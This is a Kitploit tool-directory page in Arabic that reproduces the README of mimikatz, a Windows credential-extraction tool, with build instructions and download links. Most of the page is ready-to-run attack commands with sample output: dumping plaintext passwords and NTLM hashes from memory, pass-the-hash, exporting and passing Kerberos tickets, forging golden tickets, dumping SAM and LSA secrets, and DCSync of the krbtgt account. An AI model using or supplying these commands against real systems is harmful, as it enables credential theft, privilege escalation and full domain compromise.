Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
mimikatz — أداة لاستخراج بيانات اعتماد ويندوز (كلمات المرور، التجزئات، تذاكر Kerberos) من الذاكرة وتنفيذ هجمات pass-the-hash وpass-the-ticket وgolden ticket. | Kitploit
أدوات/GitHubGitHub/parrotsec/mimikatz
تصعيد الامتيازاتتحليل الذاكرة الجنائيهجمات كلمات المرورالاستغلالالحركة الجانبيةاختبار الاختراقالمصادقةالفريق الأحمر
GitHubparrotsec/mimikatz

mimikatz

أداة لاستخراج بيانات اعتماد ويندوز (كلمات المرور، التجزئات، تذاكر Kerberos) من الذاكرة وتنفيذ هجمات pass-the-hash وpass-the-ticket وgolden ticket.

عرض المستودع
2.6k3564منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

mimikatz

mimikatz هو أداة صنعتها لتعلم C وإجراء بعض التجارب مع أمان Windows.

أصبح معروفًا الآن لاستخراج كلمات المرور بالنص الصريح، والتجزئات (hashes)، ورمز PIN، وتذاكر Kerberos من الذاكرة. يمكن لـ mimikatz أيضًا تنفيذ pass-the-hash أو pass-the-ticket أو بناء Golden tickets.

root@kitploit:~
  .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr  6 2014 22:02:03)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                    with  13 modules * * */


mimikatz # privilege::debug
Privilege '20' OK
 
mimikatz # sekurlsa::logonpasswords
 
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session           : Interactive from 2
User Name         : Gentil Kiwi
Domain            : vm-w7-ult-x
SID               : S-1-5-21-1982681256-1210654043-1600862990-1000
        msv :
         [00000003] Primary
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * Password : waza1234/
...

لكن هذا ليس كل شيء! Crypto وTerminal Server وEvents ... الكثير من المعلومات في GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki أو على http://blog.gentilkiwi.com (بالفرنسية، نعم).

إذا كنت لا تريد بنائه، فالملفات التنفيذية متاحة على https://github.com/gentilkiwi/mimikatz/releases

الاستخدام السريع

root@kitploit:~
log
privilege::debug

sekurlsa

root@kitploit:~
sekurlsa::logonpasswords
sekurlsa::tickets /export

sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

kerberos

root@kitploit:~
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi

kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi

crypto

root@kitploit:~
crypto::capi
crypto::cng

crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE

crypto::keys /export
crypto::keys /machine /export

vault & lsadump

root@kitploit:~
vault::cred
vault::list

token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert

lsadump::dcsync /user:domain\krbtgt /domain:lab.local

البناء

mimikatz يكون على شكل حل Visual Studio Solution وبرنامج تشغيل WinDDK (اختياري للعمليات الرئيسية)، لذا فإن المتطلبات الأساسية هي:

  • لـ mimikatz وmimilib: Visual Studio 2010 أو 2012 أو 2013 for Desktop (2013 Express for Desktop مجاني ويدعم x86 و x64 - http://www.microsoft.com/download/details.aspx?id=44914)
  • لـ mimikatz driver وmimilove (ومنصة ddk2003): Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800

يستخدم mimikatz نظام SVN للتحكم بالمصدر، ولكنه متاح الآن مع GIT أيضًا! يمكنك استخدام أي أدوات تريدها للمزامنة، حتى GIT المدمج في Visual Studio 2013 =)

المزامنة!

  • رابط GIT هو: https://github.com/gentilkiwi/mimikatz.git
  • رابط SVN هو: https://github.com/gentilkiwi/mimikatz/trunk
  • ملف ZIP هو: https://github.com/gentilkiwi/mimikatz/archive/master.zip

بناء الحل

  • بعد فتح الحل، نفّذ Build / Build Solution (يمكنك تغيير البنية)
  • أصبح mimikatz الآن مبنيًا وجاهزًا للاستخدام! (Win32 / x64 وحتى ARM64 إذا كنت محظوظًا)
    • قد تواجه خطأ MSB3073 بخصوص _build_.cmd وmimidrv، وذلك لأن برنامج التشغيل لا يمكن بناؤه بدون Windows Driver Kit 7.1 (WinDDK)، لكن mimikatz وmimilib سليمان.

ddk2003

باستخدام منصة MSBuild الاختيارية هذه، يمكنك استخدام أدوات بناء WinDDK ووقت التشغيل الافتراضي msvcrt (ملفات تنفيذية أصغر، بدون تبعيات)

بالنسبة لهذه المنصة الاختيارية، فإن Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 وVisual Studio 2010 إلزاميان، حتى لو كنت تخطط لاستخدام Visual Studio 2012 أو 2013 بعد ذلك.

اتبع التعليمات:

  • http://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme
  • http://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader

الترخيص

رخصة CC BY 4.0 - https://creativecommons.org/licenses/by/4.0/

يحتاج mimikatz إلى القهوة لمواصلة التطوير:

  • PayPal: https://www.paypal.me/delpy/

المؤلف

  • Benjamin DELPY gentilkiwi، يمكنك التواصل معي على Twitter ( @gentilkiwi ) أو عبر البريد ( benjamin [at] gentilkiwi.com )
  • تمت كتابة وظيفتي DCSync وDCShadow في وحدة lsadump بالاشتراك مع Vincent LE TOUX، يمكنك التواصل معه عبر البريد ( vincent.letoux [at] gmail.com ) أو زيارة موقعه ( http://www.mysmartlogon.com )

هذا تطوير شخصي، يرجى احترام فلسفته وعدم استخدامه لأمور سيئة!

تنزيل الأداة